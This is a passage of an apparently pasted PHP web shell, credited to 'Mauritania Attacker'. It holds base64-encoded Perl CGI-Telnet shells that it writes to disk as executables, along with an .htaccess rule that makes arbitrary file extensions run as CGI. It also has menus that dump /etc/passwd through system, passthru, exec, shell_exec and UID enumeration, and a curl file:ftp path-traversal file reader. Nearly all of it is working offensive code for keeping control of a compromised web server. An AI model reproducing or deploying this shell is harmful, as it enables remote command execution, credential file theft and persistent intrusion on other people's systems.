GZvciByZWFkaW5nDQoJew0KCQlpZigkV2luTlQpDQoJCXsNCgkJCWJpbm1vZGUoU0VOREZJTEUpOw0KCQkJYmlubW9kZShTVERPVVQpOw0KCQl9DQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOw0KCQkoJEZpbGVuYW1lID0gJFNlbmRGaWxlKSA9fiAgbSEoW14vXlxcXSopJCE7DQoJCXByaW50ICJDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtdW5rbm93blxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7DQoJCXByaW50ICJDb250ZW50LURpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFtZT0kMVxuXG4iOw0KCQlwcmludCB3aGlsZSg8U0VOREZJTEU+KTsNCgkJY2xvc2UoU0VOREZJTEUpOw0KCX0NCgllbHNlICMgZmFpbGVkIHRvIG9wZW4gZmlsZQ0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiZiIpOw0KCQlwcmludCAiRmFpbGVkIHRvIGRvd25sb2FkICRTZW5kRmlsZTogJCEiOw0KCQkmUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KDQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KfQ0KDQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciBkb3dubG9hZHMgYSBmaWxlLiBJdCBkaXNwbGF5cyBhIG1lc3NhZ2UNCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0KIyBUaGlzIGZ1bmN0aW9uIGlzIGFsc28gY2FsbGVkIHdoZW4gdGhlIHVzZXIgY2xpY2tzIG9uIHRoYXQgbGluay4gSW4gdGhpcyBjYXNlLA0KIyB0aGUgZmlsZSBpcyByZWFkIGFuZCBzZW50IHRvIHRoZSBicm93c2VyLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEJlZ2luRG93bmxvYWQNCnsNCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJaWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsNCgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0KCXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhhdmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIHVwbG9hZCBhIGZpbGUuIElmIHRoZQ0KIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmlsZSwgb3RoZXJ3aXNlIGl0IHN0YXJ0cyB0aGUgdXBsb2FkIHByb2Nlc3MuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgVXBsb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSB1cGxvYWQgZm9ybSBhZ2Fpbg0KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCSZQcmludEZpbGVVcGxvYWRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCQlyZXR1cm47DQoJfQ0KCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCg0KCSMgc3RhcnQgdGhlIHVwbG9hZGluZyBwcm9jZXNzDQoJcHJpbnQgIlVwbG9hZGluZyAkVHJhbnNmZXJGaWxlIHRvICRDdXJyZW50RGlyLi4uPGJyPiI7DQoNCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkDQoJY2hvcCgkVGFyZ2V0TmFtZSkgaWYgKCRUYXJnZXROYW1lID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJJFRyYW5zZmVyRmlsZSA9fiBtIShbXi9eXFxdKikkITsNCgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsNCg0KCSRUYXJnZXRGaWxlU2l6ZSA9IGxlbmd0aCgkaW57J2ZpbGVkYXRhJ30pOw0KCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdA0KCWlmKC1lICRUYXJnZXROYW1lICYmICRPcHRpb25zIG5lICJvdmVyd3JpdGUiKQ0KCXsNCgkJcHJpbnQgIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsNCgl9DQoJZWxzZSAjIGZpbGUgaXMgbm90IHByZXNlbnQNCgl7DQoJCWlmKG9wZW4oVVBMT0FERklMRSwgIj4kVGFyZ2V0TmFtZSIpKQ0KCQl7DQoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsNCgkJCXByaW50IFVQTE9BREZJTEUgJGlueydmaWxlZGF0YSd9Ow0KCQkJY2xvc2UoVVBMT0FERklMRSk7DQoJCQlwcmludCAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7DQoJCQlwcmludCAiRmlsZSBQYXRoOiAkVGFyZ2V0TmFtZTxicj4iOw0KCQl9DQoJCWVsc2UNCgkJew0KCQkJcHJpbnQgIkZhaWxlZDogJCE8YnI+IjsNCgkJfQ0KCX0NCglwcmludCAiIjsNCgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCg0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUuIElmIHRoZQ0KIyBmaWxlbmFtZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhDQojIGZpbGUsIG90aGVyd2lzZSBpdCBkaXNwbGF5cyBhIG1lc3NhZ2UgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluaw0KIyB0aHJvdWdoICB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBEb3dubG9hZEZpbGUNCnsNCgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgZG93bmxvYWQgZm9ybSBhZ2Fpbg0KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJDQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KCWlmKCgkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cXHxeLjovKSkgfA0KCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUNCgl7DQoJCSRUYXJnZXRGaWxlID0gJFRyYW5zZmVyRmlsZTsNCgl9DQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUNCgl7DQoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJfQ0KDQoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUNCgl7DQoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7DQoJfQ0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlDQoJew0KCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQomUmVhZFBhcnNlOw0KJkdldENvb2tpZXM7DQoNCiRTY3JpcHRMb2NhdGlvbiA9ICRFTlZ7J1NDUklQVF9OQU1FJ307DQokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307DQokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9Ow0KJFJ1bkNvbW1hbmQgPSAkaW57J2MnfTsNCiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsNCiRPcHRpb25zID0gJGlueydvJ307DQoNCiRBY3Rpb24gPSAkaW57J2EnfTsNCiRBY3Rpb24gPSAibG9naW4iIGlmKCRBY3Rpb24gZXEgIiIpOyAjIG5vIGFjdGlvbiBzcGVjaWZpZWQsIHVzZSBkZWZhdWx0DQoNCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQNCiRDdXJyZW50RGlyID0gJGlueydkJ307DQpjaG9wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7DQoNCiRMb2dnZWRJbiA9ICRDb29raWVzeydTQVZFRFBXRCd9IGVxICRQYXNzd29yZDsNCg0KaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pICMgdXNlciBuZWVkcy9oYXMgdG8gbG9naW4NCnsNCgkmUGVyZm9ybUxvZ2luOw0KDQp9DQplbHNpZigkQWN0aW9uIGVxICJjb21tYW5kIikgIyB1c2VyIHdhbnRzIHRvIHJ1biBhIGNvbW1hbmQNCnsNCgkmRXhlY3V0ZUNvbW1hbmQ7DQp9DQplbHNpZigkQWN0aW9uIGVxICJ1cGxvYWQiKSAjIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZQ0Kew0KCSZVcGxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAjIHVzZXIgd2FudHMgdG8gZG93bmxvYWQgYSBmaWxlDQp7DQoJJkRvd25sb2FkRmlsZTsNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImxvZ291dCIpICMgdXNlciB3YW50cyB0byBsb2dvdXQNCnsNCgkmUGVyZm9ybUxvZ291dDsNCn0=';
2424.  
2425. $file = fopen("vw.root" ,"w+");
2426. $write = fwrite ($file ,base64_decode($cgipl));
2427. fclose($file);
2428. chmod("vw.root",0755);
2429. echo "<br><center><span style='font-size:30px; font-family:Fredericka the Great; color:#009900'>Bypass Perl Security</span><br><br><iframe src=cgipl/vw.root width=75% height=50% frameborder=0></iframe>
2430.  
2431. </div>";
2432. }
2433. elseif($_GET['do'] == 'com64') {
2434. echo "<center>";
2435. echo "<ul>";
2436. echo "<li> <a href='?dir=$dir&do=betc'>Bypass /etc/passwd</a> </li>";
2437. echo "<li> <a href='?dir=$dir&do=baus'>Bypass User Server</a> </li>";
2438. echo "<li> <a href='?dir=$dir&do=b'>Bypass Perl Security</a> </li>";
2439. echo "<li> <a href='?dir=$dir&do=barut'>Bypass Root Access</a> </li>";
2440. echo "<li> <a href='?dir=$dir&do=com64'>Base64 Command</a> </li>";
2441. echo "</ul>";
2442. echo "</center>";
2443. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:white">Base64 Command</span><center><br>';
2444. echo ' <tr>
2445. <td width="100%" height="1">';
2446. if (empty($_POST['fak'])){
2447. echo '<form method="POST"><input type="text" name="fak" size="70" value="/etc/passwd"> <input type="submit" value="Encode"></form><br>';
2448. }else{
2449. $b4se64 =$_POST['fak'];
2450. $heno =base64_encode($b4se64);
2451. echo '<p align="center">';
2452. echo '<textarea method="POST" rows="1" cols="60" wrar="off">';
2453. print $heno;
2454. echo '</textarea>';
2455. }
2456. echo '<form method="post" /><input type="text" name="coz" size="43" value="L2V0Yy9wYXNzd2Q=" /> <input type="submit" value="Execute" /> <select name=dec><option value=show>Read</option><option value=decode>Command</option></select></form><br>';
2457. if( !empty($_POST['coz']) )
2458. if ($dec=='decode'){echo '<form name=form method=POST>';}
2459. echo "<p align=center><textarea style='width: 543px; height: 420px;' class='area' method='POST' name='codene' cols='70' rows='15' wrar='off' >";
2460. $ss=$_POST['coz'];
2461. $file = base64_decode($ss);
2462. if((curl_exec(curl_init('file:ftp://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../'.$file))) and empty($file))
2463. if ($_POST['dec']=='decode'){echo base64_encode($_POST['codene']);}
2464. echo '</textarea></p>';
2465. echo '</td>
2466. </tr>';
2467.  
2468. }
2469. elseif($_GET['do'] == 'betc') {
2470. echo "<center>";
2471. echo "<ul>";
2472. echo "<li> <a href='?dir=$dir&do=betc'>Bypass /etc/passwd</a> </li>";
2473. echo "<li> <a href='?dir=$dir&do=baper'>Bypass Perl Security</a> </li>";
2474. echo "<li> <a href='?dir=$dir&do=baus'>Bypass User Server</a> </li>";
2475. echo "<li> <a href='?dir=$dir&do=barut'>Bypass Perl Security</a> </li>";
2476. echo "<li> <a href='?dir=$dir&do=com64'>Base64 Command</a> </li>";
2477. echo "</ul>";
2478. echo "</center>";
2479. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Bypass /etc/passwd Priv8</span><br>Coded By Mauritania Attacker<center><br>';
2480. echo '<div class="tul"><font color="ee5500" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">
2481.  
2482.  
2483. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with System Function
2484. <form method="post">
2485. <input type="submit" value="Bypass" name="syst">
2486. </form>
2487. </center>
2488. </p>
2489.  
2490. <p><center>Bypass with Passthru Function
2491. <form method="post">
2492. <font face="Tahoma" color="#007700" size="2pt">
2493. <input type="submit" value="Bypass" name="passth">
2494. </form>
2495. </center>
2496. </p>
2497.  
2498. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with exec Function
2499. <form method="post">
2500. <input type="submit" value="Bypass" name="ex">
2501. </form>
2502. </center>
2503. </p>
2504.  
2505. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with shell_exec Function
2506. <form method="post">
2507. <input type="submit" value="Bypass" name="shex">
2508. </form>
2509. </center>
2510. </p>
2511.  
2512. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with posix_getpwuid Function
2513. <form method="post">
2514. <input type="submit" value="Bypass" name="mauritania">
2515. </form>
2516. </center>
2517. </p>
2518.  
2519. <center>';
2520.  
2521.  
2522. //System Function //
2523. if($_POST['syst'])
2524. {
2525.  
2526. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2527. echo system("cat /etc/passwd");
2528. echo"</textarea><br>";
2529. echo"
2530. <br>
2531. <b>
2532. </b>
2533. <br>
2534. ";
2535. }
2536. echo '
2537. </center>
2538. <center>';
2539.  
2540.  
2541.  
2542. //Passthru Function //
2543. if($_POST['passth'])
2544. {
2545. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2546. echo passthru("cat /etc/passwd");
2547. echo"</textarea><br>";
2548. echo"
2549. <br>
2550. <b>
2551.  
2552. </b>
2553. <br>
2554. ";
2555.  
2556. }
2557.  
2558.  
2559. echo '
2560. </center>
2561. <center>';
2562.  
2563.  
2564.  
2565. //exec Function //
2566. if($_POST['ex'])
2567. {
2568. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2569. echo exec("cat /etc/passwd");
2570. echo"</textarea><br>";
2571. echo"
2572. <br>
2573. <b>
2574. </b>
2575. <br>
2576. ";
2577. }
2578.  
2579.  
2580. echo '
2581. </center>
2582. <center>';
2583.  
2584.  
2585. //exec Function //
2586. if($_POST['shex'])
2587. {
2588. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2589. echo shell_exec("cat /etc/passwd");
2590. echo"</textarea><br>";
2591. echo"
2592. <br>
2593. <b>
2594. </b>
2595. <br>
2596. ";
2597. }
2598. echo '</center>
2599. <center>';
2600.  
2601.  
2602.  
2603. //posix_getpwuid Function //
2604. if($_POST['mauritania'])
2605. {
2606. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2607. for($uid=0;$uid<60000;$uid++){
2608. $ara = posix_getpwuid($uid);
2609. if (!empty($ara)) {
2610. while (list ($key, $val) = each($ara)){
2611. print "$val:";
2612. }
2613. print "\n";
2614. }
2615. }
2616. echo"</textarea><br>";
2617. echo"
2618. <br>
2619. <b>
2620. </b>
2621. <br>
2622. ";
2623. }
2624. }
2625. elseif($_GET['do'] == 'cgi') {
2626. mkdir('cgi4e', 0755);
2627. chdir('cgi4e');
2628. $kokdosya = ".htaccess";
2629. $dosya_adi = "$kokdosya";
2630. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
2631. $metin = "AddType application/x-httpd-cgi .izo
2632. AddType application/x-httpd-cgi .izo
2633.  
2634. AddHandler cgi-script .izo
2635. AddHandler cgi-script .izo";
2636. fwrite ( $dosya , $metin ) ;
2637. fclose ($dosya);
2638. $cgi4e = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQp1c2UgTUlNRTo6QmFzZTY0Ow0KJFZlcnNpb249ICJDR0ktVGVsbmV0IFZlcnNpb24gMS40IjsNCiRFZGl0UGVyc2lvbj0iQW5vbkdob3N0IjsNCg0KJFBhc3N3b3JkID0gIkJUTSI7CQkJIyBDaGFuZ2UgdGhpcy4gWW91IHdpbGwgbmVlZCB0byBlbnRlciB0aGlzDQoJCQkJIyB0byBsb2dpbi4NCnN1YiBJc19XaW4oKXsNCgkkb3MgPSAmdHJpbSgkRU5WeyJTRVJWRVJfU09GVFdBUkUifSk7DQoJaWYoJG9zID1+IG0vd2luL2kpew0KCQlyZXR1cm4gMTsNCgl9ZWxzZXsNCgkJcmV0dXJuIDA7DQoJfQ0KfQ0KJFdpbk5UID0gJklzX1dpbigpOwkJCSMgWW91IG5lZWQgdG8gY2hhbmdlIHRoZSB2YWx1ZSBvZiB0aGlzIHRvIDEgaWYNCgkJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQNCgkJCQkJIyBtYWNoaW5lLiBJZiB5b3UncmUgcnVubmluZyBpdCBvbiBVbml4LCB5b3UNCgkJCQkJIyBjYW4gbGVhdmUgdGhlIHZhbHVlIGFzIGl0IGlzLg0KDQokTlRDbWRTZXAgPSAiJiI7CQkJIyBUaGlzIGNoYXJhY3RlciBpcyB1c2VkIHRvIHNlcGVyYXRlIDIgY29tbWFuZHMNCgkJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULg0KDQokVW5peENtZFNlcCA9ICI7IjsJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcw0KCQkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFVuaXguDQoNCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTA7CQkjIFRpbWUgaW4gc2Vjb25kcyBhZnRlciBjb21tYW5kcyB3aWxsIGJlIGtpbGxlZA0KCQkJCQkjIERvbid0IHNldCB0aGlzIHRvIGEgdmVyeSBsYXJnZSB2YWx1ZS4gVGhpcyBpcw0KCQkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0DQoJCQkJCSMgdGFrZSB2ZXJ5IGxvbmcgdG8gZXhlY3V0ZSwgbGlrZSAiZmluZCAvIi4NCgkJCQkJIyBUaGlzIGlzIHZhbGlkIG9ubHkgb24gVW5peCBzZXJ2ZXJzLiBJdCBpcw0KCQkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4NCg0KJFNob3dEeW5hbWljT3V0cHV0ID0gMTsJCQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRhIGlzIHNlbnQgdG8gdGhlDQoJCQkJCSMgYnJvd3NlciBhcyBzb29uIGFzIGl0IGlzIG91dHB1dCwgb3RoZXJ3aXNlDQoJCQkJCSMgaXQgaXMgYnVmZmVyZWQgYW5kIHNlbmQgd2hlbiB0aGUgY29tbWFuZA0KCQkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UNCgkJCQkJIyBwaW5nLCBzbyB0aGF0IHlvdSBjYW4gc2VlIHRoZSBvdXRwdXQgYXMgaXQNCgkJCQkJIyBpcyBiZWluZyBnZW5lcmF0ZWQuDQoNCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISENCg0KJENtZFNlcCA9ICgkV2luTlQgPyAkTlRDbWRTZXAgOiAkVW5peENtZFNlcCk7DQokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7DQokUGF0aFNlcCA9ICgkV2luTlQgPyAiXFwiIDogIi8iKTsNCiRSZWRpcmVjdG9yID0gKCRXaW5OVCA/ICIgMj4mMSAxPiYyIiA6ICIgMT4mMSAyPiYxIik7DQokY29scz0gMTMwOw0KJHJvd3M9IDI2Ow0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBSZWFkcyB0aGUgaW5wdXQgc2VudCBieSB0aGUgYnJvd3NlciBhbmQgcGFyc2VzIHRoZSBpbnB1dCB2YXJpYWJsZXMuIEl0DQojIHBhcnNlcyBHRVQsIFBPU1QgYW5kIG11bHRpcGFydC9mb3JtLWRhdGEgdGhhdCBpcyB1c2VkIGZvciB1cGxvYWRpbmcgZmlsZXMuDQojIFRoZSBmaWxlbmFtZSBpcyBzdG9yZWQgaW4gJGlueydmJ30gYW5kIHRoZSBkYXRhIGlzIHN0b3JlZCBpbiAkaW57J2ZpbGVkYXRhJ30uDQojIE90aGVyIHZhcmlhYmxlcyBjYW4gYmUgYWNjZXNzZWQgdXNpbmcgJGlueyd2YXInfSwgd2hlcmUgdmFyIGlzIHRoZSBuYW1lIG9mDQojIHRoZSB2YXJpYWJsZS4gTm90ZTogTW9zdCBvZiB0aGUgY29kZSBpbiB0aGlzIGZ1bmN0aW9uIGlzIHRha2VuIGZyb20gb3RoZXIgQ0dJDQojIHNjcmlwdHMuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUmVhZFBhcnNlIA0Kew0KCWxvY2FsICgqaW4pID0gQF8gaWYgQF87DQoJbG9jYWwgKCRpLCAkbG9jLCAka2V5LCAkdmFsKTsNCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsNCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQ0KCXsNCgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQoJfQ0KCWVsc2lmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIlBPU1QiKQ0KCXsNCgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOw0KCQlyZWFkKFNURElOLCAkaW4sICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KCX0NCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhlYWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0KCQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0KCQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIvOw0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxufFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGldID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsNCgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICIiIGlmIChkZWZpbmVkKCRpbnska2V5f